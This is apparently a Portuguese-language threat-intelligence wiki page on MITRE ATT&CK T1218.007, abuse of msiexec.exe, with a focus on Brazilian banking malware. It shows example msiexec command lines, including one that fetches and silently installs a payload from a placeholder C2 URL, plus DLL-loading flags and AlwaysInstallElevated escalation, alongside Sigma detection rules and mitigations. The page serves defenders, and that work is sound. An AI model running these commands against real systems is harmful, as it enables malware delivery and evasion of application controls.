# T1218.007 - Msiexec > [!abstract] Resumo Técnico > Adversários abusam do binário legítimo `msiexec.exe` - assinado pela Microsoft - para executar pacotes MSI maliciosos locais ou remotos, carregar DLLs e contornar controles de aplicações como AppLocker e WDAC. Esta é uma subtécnica de [[t1218-system-binary-proxy-execution|T1218 - System Binary Proxy Execution]]. ## Técnica Pai Esta é uma sub-técnica de [[t1218-system-binary-proxy-execution|T1218 - T1218 - System Binary Proxy Execution]]. ## Descrição `msiexec.exe` é o interpretador nativo do Windows Installer, presente em todas as versões modernas do Windows e **assinado digitalmente pela Microsoft**. Adversários exploram esse status de binário confiável para executar payloads maliciosos por meio de um processo que soluções de segurança frequentemente consideram legítimo por padrão. O abuso de `msiexec.exe` representa uma técnica de LOLBin (Living-off-the-Land Binary): o adversário não precisa trazer executáveis não assinados para o sistema - utiliza infraestrutura nativa para alcançar execução de código arbitrário. Esta abordagem é particularmente eficaz contra: - **AppLocker** configurado para permitir executáveis assinados pela Microsoft - **WDAC (Windows Defender Application Control)** em modo de auditoria - **EDRs** com whitelisting baseado em assinatura de publisher - **Análise de linha de comando** que não inspeciona conteúdo de MSI O vetor é amplamente utilizado por grupos de crime financeiro com foco em LATAM ([[ta505|TA505]], [[g0095-machete|Machete]]) e por malware bancário brasileiro ([[s0631-chaes|Chaes]], [[s0455-metamorfo|Metamorfo]], [[s1122-mispadu|Mispadu]], [[s0530-melcoz|Melcoz]]) - tornando esta técnica de alta relevância para o contexto regional. ## Como Funciona ### Execução de MSI Local A forma mais básica envolve criar ou baixar um arquivo `.msi` malicioso e executá-lo via linha de comando: ``` msiexec.exe /q /i malicious.msi ``` O parâmetro `/q` suprime a interface gráfica, tornando a execução silenciosa. O arquivo MSI pode conter ações personalizadas (Custom Actions) que executam comandos arbitrários, scripts PowerShell, ou DLLs como parte do processo de instalação. ### Execução de MSI Remoto (URL) `msiexec.exe` suporta instalação direta de URLs via HTTP/HTTPS: ``` msiexec.exe /q /i https://[C2-server]/payload.msi ``` Esse vetor elimina a necessidade de dropar o arquivo no disco antes da execução - o MSI é baixado e executado em memória pelo próprio Windows Installer. Esta característica é explorada por campanhas de distribuição em larga escala, como as do [[s1160-latrodectus|Latrodectus]] e [[s0483-icedid|IcedID]], onde o link malicioso é enviado em emails de phishing. ### Execução de DLL via /y e /z Parâmetros menos conhecidos permitem registrar e executar DLLs diretamente: ``` msiexec.exe /y C:\path\to\malicious.dll msiexec.exe /z C:\path\to\malicious.dll ``` `/y` invoca `DllRegisterServer` e `/z` invoca `DllUnregisterServer` na DLL alvo - que pode conter código malicioso nessas funções de callback. Esta técnica é similar ao abuso de [[t1218-010-regsvr32|T1218.010 - Regsvr32]] mas usa um processo diferente como proxy. ### Escalação de Privilégios via AlwaysInstallElevated Se a política de grupo `AlwaysInstallElevated` estiver habilitada (chaves de registro `HKCU` e `HKLM` definidas como `1`), qualquer pacote MSI instalado via `msiexec.exe` roda com privilégios `SYSTEM`, independentemente do contexto do usuário que disparou a execução. Esta misconfiguration é frequentemente explorada em fases de escalação de privilégios pós-compromisso. ### Execução Aninhada e Chains Adversários frequentemente encadeiam `msiexec.exe` com outros LOLBins. Um padrão documentado nos malwares bancários brasileiros: 1. Email de phishing com link para `.msi` hospedado em infraestrutura legítima (AWS S3, GitHub, OneDrive) 2. `msiexec.exe /q /i https://...` baixa e executa o instalador 3. Custom Action dentro do MSI executa script [[t1059-005-visual-basic|VBScript]] ou [[t1059-001-powershell|PowerShell]] 4. Script faz download do payload final ([[s0631-chaes|Chaes]], [[s1122-mispadu|Mispadu]]) e estabelece persistência ## Attack Flow ```mermaid graph TB A([Adversário]) --> B[Vetor de Entrega] B --> B1["Email de Phishing<br/>com link MSI"] B --> B2["Download por outro<br/>malware/stage 1"] B --> B3["Acesso remoto<br/>pós-intrusão"] B1 --> C[Execução via msiexec.exe] B2 --> C B3 --> C C --> D{Modo de Execução} D --> D1["MSI Local<br/>/q /i arquivo.msi"] D --> D2["MSI Remoto<br/>/q /i https://c2/p.msi"] D --> D3["DLL Proxy<br/>/y ou /z dll"] D --> D4["AlwaysInstallElevated<br/>→ SYSTEM"] D1 --> E[Custom Actions no MSI] D2 --> E D3 --> F[DllRegisterServer malicioso] D4 --> G[Escalação de privilégio] E --> H["VBScript / PowerShell<br/>executados pelo installer"] F --> H H --> I[Download Payload Final] G --> I I --> J{Objetivo} J --> J1["Malware bancário<br/>Chaes / Mispadu"] J --> J2["RAT / C2<br/>Latrodectus / IcedID"] J --> J3["Ransomware<br/>QakBot → LockBit"] J --> J4["Espionagem<br/>Duqu / RCSession"] style A fill:#c0392b,color:#fff style C fill:#e67e22,color:#fff style J fill:#8e44ad,color:#fff style D4 fill:#c0392b,color:#fff ``` ## Exemplos de Uso ### Chaes (Malware Bancário Brasileiro) O [[s0631-chaes|Chaes]] é um trojan bancário com foco específico em clientes de bancos brasileiros e plataformas de e-commerce (Mercado Livre, Banco do Brasil, Itaú). O malware é distribuído via campanhas de phishing em português, onde a vítima recebe um link para um arquivo `.msi` hospedado em sites legítimos comprometidos ou serviços de nuvem. O `msiexec.exe` é usado para executar o instalador que deposita múltiplos componentes Python e scripts VBScript no sistema. O grupo por trás do Chaes tem operação documentada desde 2020 com foco exclusivo no Brasil. ### Metamorfo / Casbaneiro O [[s0455-metamorfo|Metamorfo]] (também conhecido como Casbaneiro) é um RAT bancário que compartilha infraestrutura com o [[s0631-chaes|Chaes]] e foca em vítimas brasileiras e mexicanas. O vetor de infecção inicial frequentemente usa `msiexec.exe` para instalar um dropper disfarçado de software legítimo (atualizações de Java, instaladores de Adobe Reader). O malware subsequentemente rouba credenciais bancárias e intercede transações PIX. ### Mispadu O [[s1122-mispadu|Mispadu]] é um banking trojan que opera em toda a América Latina, com campanhas específicas para Brasil, México, Argentina e Chile. A execução via `msiexec.exe` é um vetor primário, com MSIs sendo distribuídos via spam em português e espanhol. O malware é capaz de capturar capturas de tela, registrar teclas e interceptar transações bancárias online. ### Melcoz (Remote Access Trojan) O [[s0530-melcoz|Melcoz]] é atribuído ao grupo Blind Eagle e é direcionado a instituições financeiras brasileiras e chilenas. A infecção começa com um pacote MSI que instala uma DLL maliciosa via `msiexec.exe /y`. A DLL implementa a funcionalidade de acesso remoto e clipper de clipboard para sequestrar transações Bitcoin e transferências bancárias. ### TA505 (Financialmente Motivado) O [[ta505|TA505]] é um dos grupos de crime financeiro mais prolíficos globalmente, com operações documentadas em 2023-2024 usando `msiexec.exe` para distribuir o [[s1160-latrodectus|Latrodectus]] como substituto do [[s0483-icedid|IcedID]]. O grupo envia emails de phishing em escala massiva com links para MSIs hospedados em infraestrutura cloud legítima (Azure, AWS). O Latrodectus subsequentemente serve como loader para ransomware. ### Machete (APT LATAM) O [[g0095-machete|Machete]] é um grupo de espionagem com foco em alvos governamentais e militares na América Latina (Venezuela, Equador, Colômbia, Nicarágua). Documentado pelo Kaspersky usando MSIs maliciosos para distribuir seu RAT homônimo, com campanhas direcionadas a ministérios de defesa e forças armadas da região. ### ZIRCONIUM / APT31 O [[g0128-zirconium|ZIRCONIUM]] (APT31, vinculado à China) usa `msiexec.exe` em operações de espionagem contra alvos governamentais, incluindo campanhas direcionadas a entidades envolvidas em eleições. O grupo emprega MSIs com assinaturas válidas ou instaladores legítimos trojanizados. ## Detecção > [!tip] Indicadores Chave > Execução de `msiexec.exe` com URLs HTTPS como argumento é quase sempre maliciosa em ambientes corporativos. Priorizar esse padrão na detecção. ### Regra Sigma - Msiexec com URL Remota ```yaml title: Msiexec Executando MSI de URL Remota id: d6e7f809-0123-4567-def0-123456789013 status: experimental description: > Detecta execução de msiexec.exe com URL HTTP/HTTPS como argumento de instalação. Este padrão é quase exclusivamente malicioso em ambientes corporativos controlados. Técnica central em campanhas de malware bancário LATAM (Chaes, Mispadu, Metamorfo). references: - https://attack.mitre.org/techniques/T1218/007/ author: RunkIntel daté: 2026-03-25 tags: - attack.defense_evasion - attack.t1218.007 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\msiexec.exe' CommandLine|contains: - 'http://' - 'https://' CommandLine|contains: - '/i' condition: selection falsepositives: - Software corporativo que distribui updates via URL (válidar com lista de aprovados) - Ferramentas de MDM legítimas (Intune, SCCM em alguns cenários) level: high ``` ### Regra Sigma - Msiexec Carregando DLL (/y ou /z) ```yaml title: Msiexec Abusado para Carregar DLL via /y ou /z id: e7f80901-2345-6789-ef01-234567890124 status: experimental description: > Detecta uso dos parâmetros /y e /z do msiexec para invocar DllRegisterServer ou DllUnregisterServer em DLLs arbitrárias - técnica de proxy de DLL. Documentado em Melcoz e outros RATs bancários. references: - https://attack.mitre.org/techniques/T1218/007/ author: RunkIntel daté: 2026-03-25 tags: - attack.defense_evasion - attack.t1218.007 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\msiexec.exe' CommandLine|re: '(?i)\s/[yz]\s' filter_legitimate: CommandLine|contains: - 'C:\Windows\System32\' - 'C:\Windows\SysWOW64\' condition: selection and not filter_legitimate falsepositives: - Instaladores legítimos que desregistram DLLs durante uninstall (raro) level: medium ``` ### Regra Sigma - AlwaysInstallElevated Habilitado ```yaml title: AlwaysInstallElevated Habilitado - Risco de Escalação via Msiexec id: f8091023-4567-89ab-f012-345678901235 status: experimental description: > Detecta quando ambas as chaves de registro AlwaysInstallElevated estão definidas como 1, criando condição para escalação de privilégio via msiexec. Correlacionar com execuções subsequentes de msiexec.exe. references: - https://attack.mitre.org/techniques/T1218/007/ author: RunkIntel daté: 2026-03-25 tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1218.007 logsource: category: registry_set product: windows detection: selection: TargetObject|endswith: '\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated' Details: 'DWORD (0x00000001)' condition: selection falsepositives: - Ambientes onde essa política é definida por GPO legítima (documentar exceções) level: high ``` ## Mitigação | ID | Mitigação | Descrição Aplicada | |---|-----------|-------------------| | [[m1042-disable-or-remove-feature-or-program\|M1042]] | Disable or Remove Feature or Program | Se o Windows Installer não for necessário em workstations, desabilitá-lo via GPO (`Computer Configuration > Administrative Templates > Windows Components > Windows Installer`). Para servidores, restringir a instalação a contas de serviço específicas. | | [[m1026-privileged-account-management\|M1026]] | Privileged Account Management | Garantir que `AlwaysInstallElevated` estejá desabilitado em toda a organização via GPO. Auditar regularmente as chaves de registro `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer` e `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer`. Restringir quais contas podem executar instalações. | > [!warning] AppLocker não é suficiente > Muitas configurações de AppLocker explicitamente permitem `msiexec.exe` por ser um binário do Windows. Regras baseadas em publisher são ineficazes contra esta técnica. Use WDAC em modo de aplicação com regras que inspecionem argumentos de linha de comando, não apenas o publisher do executável. > [!tip] Monitoramento de Rede > Bloquear conexões HTTP/HTTPS de saída originadas de `msiexec.exe` via proxy web corporativo ou firewall de aplicação elimina o vetor de MSI remoto, que é o mais comum em campanhas de malware LATAM. ## Contexto Brasil/LATAM > [!danger] Alta Relevância Regional > O Brasil é o país mais afetado por malware bancário na América Latina. `msiexec.exe` é o vetor de entrega primário para os principais trojans bancários brasileiros: Chaes, Metamorfo, Mispadu, Melcoz e Guildma. O ecossistema de malware bancário brasileiro é único globalmente por sua sofisticação e especificidade: os grupos desenvolvem malware em português do Brasil, direcionado a sistemas bancários específicos (PIX, boleto bancário, internet banking), com campanhas que exploram sazonalidades locais (IRPF, FGTS, benefícios sociais). O padrão de ataque recorrente documentado no Brasil: 1. **Email de phishing em PT-BR** - tema: "Nota Fiscal Eletrônica", "Regularização CPF", "Aviso de entrega Correios" 2. **Link para MSI** hospedado em domínio legítimo comprometido ou serviço cloud (Dropbox, OneDrive, AWS S3) 3. **Execução silenciosa** via `msiexec.exe /q /i [URL]` 4. **Instalação de componentes Python + AutoHotKey** - arquitetura comum do Chaes e famílias relacionadas 5. **Captura de credenciais bancárias** e interceptação de transações PIX O [[g0095-machete|Machete]] representa o vetor de espionagem - com campanhas documentadas contra Forças Armadas e Ministério das Relações Exteriores de países vizinhos ao Brasil. **Setores mais afetados no Brasil:** - [[_sectors|Setor Financeiro]] - bancos de varejo, fintechs - [[_sectors|Varejo e E-commerce]] - clientes do Mercado Livre são alvo frequente do Chaes - [[_sectors|Pequenas e Médias Empresas]] - menor maturidade de segurança, maior volume de infecções ## Referências - [MITRE ATT&CK - T1218.007](https://attack.mitre.org/techniques/T1218/007/) - [Kaspersky - Chaes Banking Trojan](https://securelist.com/chaes-banking-trojan/99988/) - [ESET - Mispadu LATAM Campaigns](https://www.welivesecurity.com/en/eset-research/mispadu-banking-trojan-latam/) - [Proofpoint - TA505 e Latrodectus](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-web-emerging-malware) - [[s0631-chaes|Chaes]] · [[s0455-metamorfo|Metamorfo]] · [[s1122-mispadu|Mispadu]] · [[s0530-melcoz|Melcoz]] - [[s1160-latrodectus|Latrodectus]] · [[s0483-icedid|IcedID]] · [[s0650-qakbot|QakBot]] · [[s0038-duqu|Duqu]] - [[ta505|TA505]] · [[g0095-machete|Machete]] · [[g0021-molerats|Molerats]] · [[g0082-apt38|APT38]] - [[t1218-system-binary-proxy-execution|T1218 - System Binary Proxy Execution]] - [[t1059-001-powershell|T1059.001 - PowerShell]] · [[t1059-005-visual-basic|T1059.005 - Visual Basic]] - [[m1042-disable-or-remove-feature-or-program|M1042]] · [[m1026-privileged-account-management|M1026]] --- *Fonte: [MITRE ATT&CK - T1218.007](https://attack.mitre.org/techniques/T1218/007)*